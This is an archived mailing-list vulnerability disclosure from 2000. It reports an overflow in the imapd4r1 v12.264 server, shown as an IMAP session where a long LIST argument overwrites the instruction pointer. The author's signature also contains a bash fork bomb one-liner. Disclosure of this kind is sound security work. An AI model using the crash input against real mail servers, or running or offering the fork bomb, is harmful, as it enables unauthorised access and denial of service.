|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: imapd4r1 v12.264
From: Michal Zalewski (lcamtuf
DIONE.IDS.PL)Date: Sun Apr 16 2000 - 07:19:43 CDT
- Next message: Pete Holsberg: "Re: more problems with that POS dansie cart software!"
- Previous message: eAX [Teelicht]: "(no subject)"
- Next in thread: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Tibor Pittich: "Re: imapd4r1 v12.264"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Newest RH:
* OK nimue IMAP4rev1 v12.264 server ready
1 login lcamtuf test
1 OK LOGIN completed
1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
*sigh*
Privledges seems to be dropped, but, anyway, it's nice way to get shell
access to mail account, maybe grab some data from memory etc. I believe
both imap and ipopd packages need code security audit.
_______________________________________________________
Michal Zalewski [lcamtuftpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
===========================================================================
List przyszedł z listy <securemud.pl>
- Next message: Pete Holsberg: "Re: more problems with that POS dansie cart software!"
- Previous message: eAX [Teelicht]: "(no subject)"
- Next in thread: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Sven Carstens: "Re: imapd4r1 v12.264"
- Reply: Tibor Pittich: "Re: imapd4r1 v12.264"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]